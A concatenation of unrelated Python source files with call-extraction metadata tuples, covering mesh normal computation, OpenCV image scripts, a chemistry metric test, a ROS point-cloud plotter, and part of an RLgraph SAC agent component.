activation=activation)\n', (2435, 2473), False, 'from sklearn.neural_network import MLPClassifier\n'), ((2809, 2825), 'numpy.shape', 'np.shape', (['labels'], {}), '(labels)\n', (2817, 2825), True, 'import numpy as np\n'), ((2846, 2862), 'numpy.shape', 'np.shape', (['labels'], {}), '(labels)\n', (2854, 2862), True, 'import numpy as np\n'), ((2883, 2899), 'numpy.shape', 'np.shape', (['labels'], {}), '(labels)\n', (2891, 2899), True, 'import numpy as np\n'), ((2971, 3063), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'hidden_layer_sizes': 'bestHiddenSizesAll', 'solver': 'solver', 'alpha': 'bestAlphaAll'}), '(hidden_layer_sizes=bestHiddenSizesAll, solver=solver, alpha=\n bestAlphaAll)\n', (2984, 3063), False, 'from sklearn.neural_network import MLPClassifier\n'), ((3221, 3313), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'hidden_layer_sizes': 'bestHiddenSizesAcc', 'solver': 'solver', 'alpha': 'bestAlphaAcc'}), '(hidden_layer_sizes=bestHiddenSizesAcc, solver=solver, alpha=\n bestAlphaAcc)\n', (3234, 3313), False, 'from sklearn.neural_network import MLPClassifier\n'), ((3467, 3559), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'hidden_layer_sizes': 'bestHiddenSizesEda', 'solver': 'solver', 'alpha': 'bestAlphaEda'}), '(hidden_layer_sizes=bestHiddenSizesEda, solver=solver, alpha=\n bestAlphaEda)\n', (3480, 3559), False, 'from sklearn.neural_network import MLPClassifier\n'), ((919, 953), 'numpy.where', 'np.where', (['(groups != 5)', '(True)', '(False)'], {}), '(groups != 5, True, False)\n', (927, 953), True, 'import numpy as np\n'), ((955, 990), 'numpy.where', 'np.where', (['(groups != 17)', '(True)', '(False)'], {}), '(groups != 17, True, False)\n', (963, 990), True, 'import numpy as np\n'), ((3895, 3925), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['labels', 'predAll'], {}), '(labels, predAll)\n', (3908, 3925), False, 'from sklearn.metrics import roc_auc_score\n'), ((3978, 4008), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['labels', 'predAcc'], {}), '(labels, predAcc)\n', (3991, 4008), False, 'from sklearn.metrics import roc_auc_score\n'), ((4061, 4091), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['labels', 'predEda'], {}), '(labels, predEda)\n', (4074, 4091), False, 'from sklearn.metrics import roc_auc_score\n')]
|
# Copyright (c) Facebook, Inc. and its affiliates.
import numpy as np
# vertices: frames x meshVerNum x 3
# trifaces: facePolygonNum x 3 = 22800 x 3
def ComputeNormal(vertices, trifaces):
if vertices.shape[0] > 5000:
print('ComputeNormal: Warning: too big to compute {0}'.format(vertices.shape) )
return
#compute vertex Normals for all frames
U = vertices[:,trifaces[:,1],:] - vertices[:,trifaces[:,0],:] #frames x faceNum x 3
V = vertices[:,trifaces[:,2],:] - vertices[:,trifaces[:,1],:] #frames x faceNum x 3
originalShape = U.shape #remember: frames x faceNum x 3
U = np.reshape(U, [-1,3])
V = np.reshape(V, [-1,3])
faceNormals = np.cross(U,V) #frames x 13776 x 3
from sklearn.preprocessing import normalize
if np.isnan(np.max(faceNormals)):
print('ComputeNormal: Warning nan is detected {0}')
return
faceNormals = normalize(faceNormals)
faceNormals = np.reshape(faceNormals, originalShape)
if False: #Slow version
vertex_normals = np.zeros(vertices.shape) #(frames x 11510) x 3
for fIdx, vIdx in enumerate(trifaces[:,0]):
vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
for fIdx, vIdx in enumerate(trifaces[:,1]):
vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
for fIdx, vIdx in enumerate(trifaces[:,2]):
vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
else: #Faster version
# Computing vertex normals, much faster (and obscure) replacement
index = np.vstack((np.ravel(trifaces), np.repeat(np.arange(len(trifaces)), 3))).T
index_sorted = index[index[:,0].argsort()]
vertex_normals = np.add.reduceat(faceNormals[:,index_sorted[:, 1],:][0],
np.concatenate(([0], np.cumsum(np.unique(index_sorted[:, 0],
return_counts=True)[1])[:-1])))[None, :]
vertex_normals = vertex_normals.astype(np.float64)
originalShape = vertex_normals.shape
vertex_normals = np.reshape(vertex_normals, [-1,3])
vertex_normals = normalize(vertex_normals)
vertex_normals = np.reshape(vertex_normals,originalShape)
return vertex_normals
def ComputeNormal_gpu(vertices, trifaces):
import torch
import torch.nn.functional as F
if vertices.shape[0] > 5000:
print('ComputeNormal: Warning: too big to compute {0}'.format(vertices.shape) )
return
#compute vertex Normals for all frames
#trifaces_cuda = torch.from_numpy(trifaces.astype(np.long)).cuda()
vertices_cuda = torch.from_numpy(vertices.astype(np.float32)).cuda()
U_cuda = vertices_cuda[:,trifaces[:,1],:] - vertices_cuda[:,trifaces[:,0],:] #frames x faceNum x 3
V_cuda = vertices_cuda[:,trifaces[:,2],:] - vertices_cuda[:,trifaces[:,1],:] #frames x faceNum x 3
originalShape = list(U_cuda.size()) #remember: frames x faceNum x 3
U_cuda = torch.reshape(U_cuda, [-1,3])#.astype(np.float32)
V_cuda = torch.reshape(V_cuda, [-1,3])#.astype(np.float32)
faceNormals = U_cuda.cross(V_cuda)
faceNormals = F.normalize(faceNormals,dim=1)
faceNormals = torch.reshape(faceNormals, originalShape)
# trifaces has duplicated vertex index, so cannot be parallazied
# vertex_normals = torch.zeros(vertices.shape,dtype=torch.float32).cuda() #(frames x 11510) x 3
# for fIdx, vIdx in enumerate(trifaces[:,0]):
# vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
# for fIdx, vIdx in enumerate(trifaces[:,1]):
# vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
# for fIdx, vIdx in enumerate(trifaces[:,2]):
# vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
# Computing vertex normals, much faster (and obscure) replacement
index = np.vstack((np.ravel(trifaces), np.repeat(np.arange(len(trifaces)), 3))).T
index_sorted = index[index[:,0].argsort()]
vertex_normals = np.add.reduceat(faceNormals[:,index_sorted[:, 1],:][0],
np.concatenate(([0], np.cumsum(np.unique(index_sorted[:, 0],
return_counts=True)[1])[:-1])))[None, :]
vertex_normals = torch.from_numpy(vertex_normals).float().cuda()
vertex_normals = F.normalize(vertex_normals,dim=2)
vertex_normals = vertex_normals.data.cpu().numpy() #(batch, chunksize, dim)
return vertex_normals
|
[
"numpy.ravel",
"numpy.cross",
"numpy.zeros",
"numpy.max",
"sklearn.preprocessing.normalize",
"numpy.reshape",
"torch.reshape",
"torch.nn.functional.normalize",
"numpy.unique",
"torch.from_numpy"
] |
[((620, 642), 'numpy.reshape', 'np.reshape', (['U', '[-1, 3]'], {}), '(U, [-1, 3])\n', (630, 642), True, 'import numpy as np\n'), ((650, 672), 'numpy.reshape', 'np.reshape', (['V', '[-1, 3]'], {}), '(V, [-1, 3])\n', (660, 672), True, 'import numpy as np\n'), ((690, 704), 'numpy.cross', 'np.cross', (['U', 'V'], {}), '(U, V)\n', (698, 704), True, 'import numpy as np\n'), ((908, 930), 'sklearn.preprocessing.normalize', 'normalize', (['faceNormals'], {}), '(faceNormals)\n', (917, 930), False, 'from sklearn.preprocessing import normalize\n'), ((950, 988), 'numpy.reshape', 'np.reshape', (['faceNormals', 'originalShape'], {}), '(faceNormals, originalShape)\n', (960, 988), True, 'import numpy as np\n'), ((2011, 2046), 'numpy.reshape', 'np.reshape', (['vertex_normals', '[-1, 3]'], {}), '(vertex_normals, [-1, 3])\n', (2021, 2046), True, 'import numpy as np\n'), ((2067, 2092), 'sklearn.preprocessing.normalize', 'normalize', (['vertex_normals'], {}), '(vertex_normals)\n', (2076, 2092), False, 'from sklearn.preprocessing import normalize\n'), ((2114, 2155), 'numpy.reshape', 'np.reshape', (['vertex_normals', 'originalShape'], {}), '(vertex_normals, originalShape)\n', (2124, 2155), True, 'import numpy as np\n'), ((2902, 2932), 'torch.reshape', 'torch.reshape', (['U_cuda', '[-1, 3]'], {}), '(U_cuda, [-1, 3])\n', (2915, 2932), False, 'import torch\n'), ((2965, 2995), 'torch.reshape', 'torch.reshape', (['V_cuda', '[-1, 3]'], {}), '(V_cuda, [-1, 3])\n', (2978, 2995), False, 'import torch\n'), ((3073, 3104), 'torch.nn.functional.normalize', 'F.normalize', (['faceNormals'], {'dim': '(1)'}), '(faceNormals, dim=1)\n', (3084, 3104), True, 'import torch.nn.functional as F\n'), ((3123, 3164), 'torch.reshape', 'torch.reshape', (['faceNormals', 'originalShape'], {}), '(faceNormals, originalShape)\n', (3136, 3164), False, 'import torch\n'), ((4154, 4188), 'torch.nn.functional.normalize', 'F.normalize', (['vertex_normals'], {'dim': '(2)'}), '(vertex_normals, dim=2)\n', (4165, 4188), True, 'import torch.nn.functional as F\n'), ((793, 812), 'numpy.max', 'np.max', (['faceNormals'], {}), '(faceNormals)\n', (799, 812), True, 'import numpy as np\n'), ((1050, 1074), 'numpy.zeros', 'np.zeros', (['vertices.shape'], {}), '(vertices.shape)\n', (1058, 1074), True, 'import numpy as np\n'), ((3758, 3776), 'numpy.ravel', 'np.ravel', (['trifaces'], {}), '(trifaces)\n', (3766, 3776), True, 'import numpy as np\n'), ((1568, 1586), 'numpy.ravel', 'np.ravel', (['trifaces'], {}), '(trifaces)\n', (1576, 1586), True, 'import numpy as np\n'), ((4084, 4116), 'torch.from_numpy', 'torch.from_numpy', (['vertex_normals'], {}), '(vertex_normals)\n', (4100, 4116), False, 'import torch\n'), ((3984, 4033), 'numpy.unique', 'np.unique', (['index_sorted[:, 0]'], {'return_counts': '(True)'}), '(index_sorted[:, 0], return_counts=True)\n', (3993, 4033), True, 'import numpy as np\n'), ((1806, 1855), 'numpy.unique', 'np.unique', (['index_sorted[:, 0]'], {'return_counts': '(True)'}), '(index_sorted[:, 0], return_counts=True)\n', (1815, 1855), True, 'import numpy as np\n')]
|
import os
import numpy as np
import cv2
import sys
#sys.path.insert(0, '/home/kumarak/Desktop/campus_temp/pred2/')
#import get_dataset_colormap
read="./all_at_100_nocol/"
gtread=open("./thinglabels.txt").readlines()
gt={}
#print(gtread)
for i in gtread:
gt[int(i.split(':')[0])]=i.split(':')[1][1:-1]
#print(gt)
#map=get_dataset_colormap.create_label_colormap()
#list=[(map[i],i) for i in range(0,len(map))]
list=[]
for filename in os.listdir(read):
#print(filename)
if filename.endswith('.png'):
img=cv2.imread(read+filename)
classes=[gt[i] for i in np.unique(img) if i!=255]
list.append((filename,classes))
for i in sorted(list):
print(i)
|
[
"cv2.imread",
"os.listdir",
"numpy.unique"
] |
[((435, 451), 'os.listdir', 'os.listdir', (['read'], {}), '(read)\n', (445, 451), False, 'import os\n'), ((508, 535), 'cv2.imread', 'cv2.imread', (['(read + filename)'], {}), '(read + filename)\n', (518, 535), False, 'import cv2\n'), ((560, 574), 'numpy.unique', 'np.unique', (['img'], {}), '(img)\n', (569, 574), True, 'import numpy as np\n')]
|
import cv2
import numpy as np
img = cv2.imread('imagem.jpg')
##img = cv2.imread('imagem3.jpg',0)
cv2.imshow('imagem',img)
img = cv2.GaussianBlur(img, (7, 5), 0)
cv2.imshow('imagemblur',img)
gray_img = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
circles = cv2.HoughCircles(gray_img,cv2.HOUGH_GRADIENT,1,30,
param1=50,param2=30,minRadius=0,maxRadius=60)
cimg = img
circles = np.uint16(np.around(circles))
for i in circles[0,:]:
# draw the outer circle
cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)
# draw the center of the circle
cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)
cv2.circle(cimg,(0,0),i[2],(0,0,255),2)
cv2.circle(cimg,(390,390),i[2],(255,0,0),2)
cv2.imshow('detected circles',cimg)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"cv2.GaussianBlur",
"cv2.HoughCircles",
"cv2.circle",
"cv2.cvtColor",
"cv2.waitKey",
"cv2.destroyAllWindows",
"cv2.imread",
"numpy.around",
"cv2.imshow"
] |
[((40, 64), 'cv2.imread', 'cv2.imread', (['"""imagem.jpg"""'], {}), "('imagem.jpg')\n", (50, 64), False, 'import cv2\n'), ((103, 128), 'cv2.imshow', 'cv2.imshow', (['"""imagem"""', 'img'], {}), "('imagem', img)\n", (113, 128), False, 'import cv2\n'), ((135, 167), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['img', '(7, 5)', '(0)'], {}), '(img, (7, 5), 0)\n', (151, 167), False, 'import cv2\n'), ((169, 198), 'cv2.imshow', 'cv2.imshow', (['"""imagemblur"""', 'img'], {}), "('imagemblur', img)\n", (179, 198), False, 'import cv2\n'), ((210, 247), 'cv2.cvtColor', 'cv2.cvtColor', (['img', 'cv2.COLOR_RGB2GRAY'], {}), '(img, cv2.COLOR_RGB2GRAY)\n', (222, 247), False, 'import cv2\n'), ((262, 368), 'cv2.HoughCircles', 'cv2.HoughCircles', (['gray_img', 'cv2.HOUGH_GRADIENT', '(1)', '(30)'], {'param1': '(50)', 'param2': '(30)', 'minRadius': '(0)', 'maxRadius': '(60)'}), '(gray_img, cv2.HOUGH_GRADIENT, 1, 30, param1=50, param2=30,\n minRadius=0, maxRadius=60)\n', (278, 368), False, 'import cv2\n'), ((635, 681), 'cv2.circle', 'cv2.circle', (['cimg', '(0, 0)', 'i[2]', '(0, 0, 255)', '(2)'], {}), '(cimg, (0, 0), i[2], (0, 0, 255), 2)\n', (645, 681), False, 'import cv2\n'), ((676, 726), 'cv2.circle', 'cv2.circle', (['cimg', '(390, 390)', 'i[2]', '(255, 0, 0)', '(2)'], {}), '(cimg, (390, 390), i[2], (255, 0, 0), 2)\n', (686, 726), False, 'import cv2\n'), ((723, 759), 'cv2.imshow', 'cv2.imshow', (['"""detected circles"""', 'cimg'], {}), "('detected circles', cimg)\n", (733, 759), False, 'import cv2\n'), ((760, 774), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (771, 774), False, 'import cv2\n'), ((776, 799), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (797, 799), False, 'import cv2\n'), ((423, 441), 'numpy.around', 'np.around', (['circles'], {}), '(circles)\n', (432, 441), True, 'import numpy as np\n'), ((501, 553), 'cv2.circle', 'cv2.circle', (['cimg', '(i[0], i[1])', 'i[2]', '(0, 255, 0)', '(2)'], {}), '(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)\n', (511, 553), False, 'import cv2\n'), ((589, 638), 'cv2.circle', 'cv2.circle', (['cimg', '(i[0], i[1])', '(2)', '(0, 0, 255)', '(3)'], {}), '(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)\n', (599, 638), False, 'import cv2\n')]
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from enum import Enum
from unittest import mock
import numpy as np
import pandas as pd
from ax.core.arm import Arm
from ax.core.generator_run import GeneratorRun
from ax.metrics.chemistry import ChemistryMetric, ChemistryProblemType
from ax.utils.common.testutils import TestCase
from ax.utils.testing.core_stubs import get_trial
class DummyEnum(Enum):
DUMMY: str = "dummy"
class ChemistryMetricTest(TestCase):
def testChemistryMetric(self):
# basic test
read_csv = pd.read_csv
for problem_type in (
ChemistryProblemType.DIRECT_ARYLATION,
ChemistryProblemType.SUZUKI,
):
with mock.patch(
"ax.metrics.chemistry.pd.read_csv",
wraps=lambda filename, index_col: read_csv(
filename, index_col=index_col, nrows=1
),
) as mock_read_csv:
metric = ChemistryMetric(name="test_metric", problem_type=problem_type)
self.assertFalse(metric.noiseless)
self.assertIs(metric.problem_type, problem_type)
self.assertFalse(metric.lower_is_better)
if problem_type is ChemistryProblemType.DIRECT_ARYLATION:
param_names = [
"Base_SMILES",
"Concentration",
"Ligand_SMILES",
"Solvent_SMILES",
"Temp_C",
]
param_values = (
"O=C([O-])C.[K+]",
0.1,
(
"CC(C)C1=CC(C(C)C)=C(C(C(C)C)=C1)C2=C(P(C3CCCCC3)"
"C4CCCCC4)C(OC)=CC=C2OC"
),
"CC(N(C)C)=O",
105,
)
obj = 5.47
else:
param_names = [
"Base_SMILES",
"Electrophile_SMILES",
"Ligand_SMILES",
"Nucleophile_SMILES",
"Solvent_SMILES",
]
param_values = (
"[Na+].[OH-]",
"ClC1=CC=C(N=CC=C2)C2=C1",
"CC(P(C(C)(C)C)C(C)(C)C)(C)C",
"CC1=CC=C(N(C2CCCCO2)N=C3)C3=C1B(O)O",
"N#CC",
)
obj = 4.76
params = dict(zip(param_names, param_values))
trial = get_trial()
trial._generator_run = GeneratorRun(
arms=[Arm(name="0_0", parameters=params)]
)
df = metric.fetch_trial_data(trial).df
self.assertEqual(mock_read_csv.call_count, 1)
self.assertEqual(df["mean"].values[0], obj)
self.assertTrue(np.isnan(df["sem"].values[0]))
# test caching
metric.fetch_trial_data(trial)
self.assertEqual(mock_read_csv.call_count, 1)
# test noiseless
metric = ChemistryMetric(
name="test_metric", problem_type=problem_type, noiseless=True
)
df = metric.fetch_trial_data(trial).df
self.assertEqual(df["sem"].values[0], 0.0)
|
[
"ax.core.arm.Arm",
"ax.metrics.chemistry.ChemistryMetric",
"ax.utils.testing.core_stubs.get_trial",
"numpy.isnan"
] |
[((1119, 1181), 'ax.metrics.chemistry.ChemistryMetric', 'ChemistryMetric', ([], {'name': '"""test_metric"""', 'problem_type': 'problem_type'}), "(name='test_metric', problem_type=problem_type)\n", (1134, 1181), False, 'from ax.metrics.chemistry import ChemistryMetric, ChemistryProblemType\n'), ((2811, 2822), 'ax.utils.testing.core_stubs.get_trial', 'get_trial', ([], {}), '()\n', (2820, 2822), False, 'from ax.utils.testing.core_stubs import get_trial\n'), ((3395, 3473), 'ax.metrics.chemistry.ChemistryMetric', 'ChemistryMetric', ([], {'name': '"""test_metric"""', 'problem_type': 'problem_type', 'noiseless': '(True)'}), "(name='test_metric', problem_type=problem_type, noiseless=True)\n", (3410, 3473), False, 'from ax.metrics.chemistry import ChemistryMetric, ChemistryProblemType\n'), ((3165, 3194), 'numpy.isnan', 'np.isnan', (["df['sem'].values[0]"], {}), "(df['sem'].values[0])\n", (3173, 3194), True, 'import numpy as np\n'), ((2902, 2936), 'ax.core.arm.Arm', 'Arm', ([], {'name': '"""0_0"""', 'parameters': 'params'}), "(name='0_0', parameters=params)\n", (2905, 2936), False, 'from ax.core.arm import Arm\n')]
|
import rospy
from sensor_msgs.msg import PointCloud2
from sensor_msgs import point_cloud2
from geometry_msgs.msg import PoseArray, Pose
from tf.transformations import euler_from_quaternion
import time
import math
import struct
import ctypes
from scipy import ndimage
import matplotlib.pyplot as plt
from nav_msgs.msg import Odometry
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
class identifyObstacle3D:
def __init__(self):
self.currentPosX, self.currentPosY, self.currentPosZ, self.currentPosYaw = 2, 2, 2, 0
self.count = 0
self.unic = 0
self.pub = rospy.Publisher('/build_map3D', PoseArray, queue_size=1)
self.all = []
self.obsX, self.obsY, self.obsZ = [], [], []
self.t = time.time()
self.number_of_sampling = 30
rospy.init_node("obstacle3D")
print("Start")
# _ = rospy.Subscriber("/uav1/velodyne/scan", PointCloud2, self.callbackObstacle)
_ = rospy.Subscriber("/uav1/rs_d435/depth/points", PointCloud2, self.callbackObstacle)
_ = rospy.Subscriber("/uav1/odometry/odom_main", Odometry, self.callbackPosicao)
def callbackPosicao(self, odom):
_, _, yaw = euler_from_quaternion([odom.pose.pose.orientation.x, odom.pose.pose.orientation.y, odom.pose.pose.orientation.z, odom.pose.pose.orientation.w])
if self.count == 0:
self.lastYaw = yaw
self.currentPosX = odom.pose.pose.position.x
self.currentPosY = odom.pose.pose.position.y
self.currentPosY = odom.pose.pose.position.z
self.currentPosYaw = yaw
self.count += 1
def rotationMatrix(self, psi0, x1, y1, z1):
r = [[np.cos(psi0), np.sin(psi0) * -1, 0], [np.sin(psi0), np.cos(psi0), 0], [0, 0, 1]]
pos_local = np.dot(np.transpose(np.asarray(r)), np.asarray([x1, y1, z1]))
return pos_local
def callbackObstacle(self, data):
print(time.time()-self.t)
if self.count > 0:
a4, a5, a6 = [], [], []
a1, a2, a3 = [], [], []
x, y, z = [], [], []
abc = []
matriz = np.zeros((101, 101))
xyz = np.array([[0,0,0]])
gen = point_cloud2.read_points(data, skip_nans=True)
int_data = list(gen)
for x in int_data:
if round(x[2]) > 0 and [round(x[0]), round(-x[1]), round(x[2])] not in abc:
a4.append(round(x[0]))
a5.append(round(-x[1]))
a6.append(round(x[2]))
abc.append([round(x[0]), round(-x[1]), round(x[2])])
pl = self.rotationMatrix(0, a4, a5, a6)
for i1, i2, i3 in zip(pl[0], pl[1], pl[2]):
a1.append(i2)
a2.append(i1)
a3.append(i3)
xyz = np.append(xyz,[[i2, i1, i3]], axis = 0)
self.count += 1
if 8<time.time()-self.t<13:
ax = plt.axes(projection = "3d")
ax.plot3D(a1, a2, a3, 'y.')
ax.plot3D([self.currentPosX], [self.currentPosY], [self.currentPosZ], ".r")
ax.set_xlim(0,20)
ax.set_ylim(0,20)
ax.set_zlim(0,20)
ax.set_xlabel("x (m)" + str(self.currentPosX))
ax.set_ylabel("y (m)" + str(self.currentPosY))
ax.set_zlabel("z (m)" + str(self.currentPosZ))
ax.view_init(50, -137)
plt.pause(0.01)
plt.show()
def main():
identifyObstacle3D()
try:
rospy.spin()
except rospy.ROSInterruptException:
pass
if __name__ == '__main__':
main()
|
[
"rospy.Subscriber",
"sensor_msgs.point_cloud2.read_points",
"matplotlib.pyplot.show",
"matplotlib.pyplot.axes",
"numpy.asarray",
"numpy.zeros",
"rospy.Publisher",
"time.time",
"numpy.append",
"numpy.sin",
"numpy.array",
"rospy.init_node",
"numpy.cos",
"tf.transformations.euler_from_quaternion",
"rospy.spin",
"matplotlib.pyplot.pause"
] |
[((602, 658), 'rospy.Publisher', 'rospy.Publisher', (['"""/build_map3D"""', 'PoseArray'], {'queue_size': '(1)'}), "('/build_map3D', PoseArray, queue_size=1)\n", (617, 658), False, 'import rospy\n'), ((751, 762), 'time.time', 'time.time', ([], {}), '()\n', (760, 762), False, 'import time\n'), ((810, 839), 'rospy.init_node', 'rospy.init_node', (['"""obstacle3D"""'], {}), "('obstacle3D')\n", (825, 839), False, 'import rospy\n'), ((966, 1053), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/uav1/rs_d435/depth/points"""', 'PointCloud2', 'self.callbackObstacle'], {}), "('/uav1/rs_d435/depth/points', PointCloud2, self.\n callbackObstacle)\n", (982, 1053), False, 'import rospy\n'), ((1061, 1137), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/uav1/odometry/odom_main"""', 'Odometry', 'self.callbackPosicao'], {}), "('/uav1/odometry/odom_main', Odometry, self.callbackPosicao)\n", (1077, 1137), False, 'import rospy\n'), ((1196, 1344), 'tf.transformations.euler_from_quaternion', 'euler_from_quaternion', (['[odom.pose.pose.orientation.x, odom.pose.pose.orientation.y, odom.pose.pose\n .orientation.z, odom.pose.pose.orientation.w]'], {}), '([odom.pose.pose.orientation.x, odom.pose.pose.\n orientation.y, odom.pose.pose.orientation.z, odom.pose.pose.orientation.w])\n', (1217, 1344), False, 'from tf.transformations import euler_from_quaternion\n'), ((3598, 3610), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (3608, 3610), False, 'import rospy\n'), ((1834, 1858), 'numpy.asarray', 'np.asarray', (['[x1, y1, z1]'], {}), '([x1, y1, z1])\n', (1844, 1858), True, 'import numpy as np\n'), ((2132, 2152), 'numpy.zeros', 'np.zeros', (['(101, 101)'], {}), '((101, 101))\n', (2140, 2152), True, 'import numpy as np\n'), ((2171, 2192), 'numpy.array', 'np.array', (['[[0, 0, 0]]'], {}), '([[0, 0, 0]])\n', (2179, 2192), True, 'import numpy as np\n'), ((2212, 2258), 'sensor_msgs.point_cloud2.read_points', 'point_cloud2.read_points', (['data'], {'skip_nans': '(True)'}), '(data, skip_nans=True)\n', (2236, 2258), False, 'from sensor_msgs import point_cloud2\n'), ((1697, 1709), 'numpy.cos', 'np.cos', (['psi0'], {}), '(psi0)\n', (1703, 1709), True, 'import numpy as np\n'), ((1735, 1747), 'numpy.sin', 'np.sin', (['psi0'], {}), '(psi0)\n', (1741, 1747), True, 'import numpy as np\n'), ((1749, 1761), 'numpy.cos', 'np.cos', (['psi0'], {}), '(psi0)\n', (1755, 1761), True, 'import numpy as np\n'), ((1818, 1831), 'numpy.asarray', 'np.asarray', (['r'], {}), '(r)\n', (1828, 1831), True, 'import numpy as np\n'), ((1938, 1949), 'time.time', 'time.time', ([], {}), '()\n', (1947, 1949), False, 'import time\n'), ((2853, 2891), 'numpy.append', 'np.append', (['xyz', '[[i2, i1, i3]]'], {'axis': '(0)'}), '(xyz, [[i2, i1, i3]], axis=0)\n', (2862, 2891), True, 'import numpy as np\n'), ((2984, 3009), 'matplotlib.pyplot.axes', 'plt.axes', ([], {'projection': '"""3d"""'}), "(projection='3d')\n", (2992, 3009), True, 'import matplotlib.pyplot as plt\n'), ((3498, 3513), 'matplotlib.pyplot.pause', 'plt.pause', (['(0.01)'], {}), '(0.01)\n', (3507, 3513), True, 'import matplotlib.pyplot as plt\n'), ((3530, 3540), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3538, 3540), True, 'import matplotlib.pyplot as plt\n'), ((1711, 1723), 'numpy.sin', 'np.sin', (['psi0'], {}), '(psi0)\n', (1717, 1723), True, 'import numpy as np\n'), ((2940, 2951), 'time.time', 'time.time', ([], {}), '()\n', (2949, 2951), False, 'import time\n')]
|
# Copyright 2018/2019 The RLgraph authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import, division, print_function
import numpy as np
from rlgraph import get_backend
from rlgraph.agents import Agent
from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay
from rlgraph.components.loss_functions.sac_loss_function import SACLossFunction
from rlgraph.spaces import FloatBox, BoolBox, IntBox, ContainerSpace
from rlgraph.spaces.space_utils import sanity_check_space
from rlgraph.utils import RLGraphError
from rlgraph.utils.decorators import rlgraph_api, graph_fn
from rlgraph.utils.ops import flatten_op, DataOpTuple
from rlgraph.utils.util import strip_list, force_list
if get_backend() == "tf":
import tensorflow as tf
elif get_backend() == "pytorch":
import torch
class SyncSpecification(object):
"""Describes a synchronization schedule, used to update the target value weights. The target values are gradually
updates using exponential moving average as suggested by the paper."""
def __init__(self, sync_interval=None, sync_tau=None):
"""
Arguments:
sync_interval: How often to update the target.
sync_tau: The smoothing constant to use in the averaging. Setting to 1 replaces the values each iteration.
"""
self.sync_interval = sync_interval
self.sync_tau = sync_tau
class SACAgentComponent(Component):
def __init__(self, agent, policy, q_function, preprocessor, memory, discount, initial_alpha, target_entropy,
optimizer, vf_optimizer, alpha_optimizer, q_sync_spec, num_q_functions=2):
super(SACAgentComponent, self).__init__(nesting_level=0)
self.agent = agent
self._policy = policy
self._preprocessor = preprocessor
self._memory = memory
self._q_functions = [q_function]
self._q_functions += [q_function.copy(scope="{}-{}".format(q_function.scope, i + 1), trainable=True)
for i in range(num_q_functions - 1)]
# Set number of return values for get_q_values graph_fn.
self.graph_fn_num_outputs["_graph_fn_get_q_values"] = num_q_functions
for q in self._q_functions:
# TODO: is there a better way to do this?
if "synchronizable" not in q.sub_components:
q.add_components(Synchronizable(), expose_apis="sync")
self._target_q_functions = [q.copy(scope="target-" + q.scope, trainable=True) for q in self._q_functions]
for target_q in self._target_q_functions:
# TODO: is there a better way to do this?
if "synchronizable" not in target_q.sub_components:
target_q.add_components(Synchronizable(), expose_apis="sync")
self._optimizer = optimizer
self.vf_optimizer = vf_optimizer
self.alpha_optimizer = alpha_optimizer
self.initial_alpha = initial_alpha
self.log_alpha = None
self.target_entropy = target_entropy
self.loss_function = SACLossFunction(target_entropy=target_entropy, discount=discount,
num_q_functions=num_q_functions)
memory_items = ["states", "actions", "rewards", "next_states", "terminals"]
self._merger = ContainerMerger(*memory_items)
q_names = ["q_{}".format(i) for i in range(len(self._q_functions))]
self._q_vars_merger = ContainerMerger(*q_names, scope="q_vars_merger")
self.add_components(policy, preprocessor, memory, self._merger, self.loss_function,
optimizer, vf_optimizer, self._q_vars_merger) # , self._q_vars_splitter)
self.add_components(*self._q_functions)
self.add_components(*self._target_q_functions)
if self.alpha_optimizer is not None:
self.add_components(self.alpha_optimizer)
self.steps_since_last_sync = None
self.q_sync_spec = q_sync_spec
self.env_action_space = None
self.episode_reward = None
def check_input_spaces(self, input_spaces, action_space=None):
for s in ["states", "actions", "env_actions", "preprocessed_states", "rewards", "terminals"]:
sanity_check_space(input_spaces[s], must_have_batch_rank=True)
self.env_action_space = input_spaces["env_actions"].flatten()
def create_variables(self, input_spaces, action_space=None):
self.steps_since_last_sync = self.get_variable("steps_since_last_sync", dtype="int", initializer=0)
self.log_alpha = self.get_variable("log_alpha", dtype="float", initializer=np.log(self.initial_alpha))
self.episode_reward = self.get_variable("episode_reward", shape=(), initializer=0.0)
@rlgraph_api
def get_policy_weights(self):
return self._policy.variables()
@rlgraph_api
def get_q_weights(self):
merged_weights = self._q_vars_merger.merge(*[q.variables() for q in self._q_functions])
return merged_weights
@rlgraph_api(must_be_complete=False)
def set_policy_weights(self, weights):
return self._policy.sync(weights)
""" TODO: need to define the input space
